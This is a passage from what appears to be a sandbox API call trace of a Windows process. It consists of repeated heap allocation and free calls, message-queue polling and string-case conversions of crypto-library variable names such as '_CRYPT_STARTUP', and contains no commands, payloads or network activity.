(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.266] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.266] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.266] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0267.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.267] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0267.267] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0267.267] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.267] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.268] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.268] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0267.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0267.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0267.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.269] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f2ef60 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2ef60 | out: hHeap=0x970000) returned 1 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, 